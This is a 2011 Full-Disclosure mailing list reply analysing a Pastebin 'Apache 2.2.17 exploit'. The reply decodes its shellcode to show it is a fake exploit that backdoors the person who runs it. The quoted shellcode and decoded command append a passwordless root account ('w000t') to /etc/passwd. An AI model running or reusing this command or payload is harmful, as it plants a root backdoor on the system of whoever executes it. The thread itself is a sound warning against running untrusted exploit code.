[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Apache 2.2.17 exploit?
- To: <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] Apache 2.2.17 exploit?
- From: VeNoMouS <venom@xxxxxxxxxxx>
- Date: Wed, 05 Oct 2011 15:09:54 +1300
char evil[] =
"xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89"
"x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89"
"x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8"
"xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23"
"x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74"
"x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a"
"x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68"
"x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64"
"x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44"
"x44x44"
.....
execl("/bin/sh", "sh", "-c", evil, 0);
.....
/bin/echo
w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd
AHUH.....
On Mon,
3 Oct 2011 15:31:29 +0100, Darren Martyn wrote:
> I regularly trawl
Pastebin.com to find code - often idiots leave some 0day and similar
there and it is nice to find.
>
> Well, seeing as I have no test boxes
at the moment, can someone check this code in a VM? I am not sure if it
is legit or not.
>
> http://pastebin.com/ygByEV2e [1]
>
> Thanks :)
>
> ~Darren
*
char evil[] =
*
"xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89"
*
"x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89"
*
"x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8"
*
"xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23"
*
"x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74"
*
"x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a"
*
"x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68"
*
"x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64"
*
"x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44"
*
"x44x44";
Links:
------
[1] http://pastebin.com/ygByEV2e
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/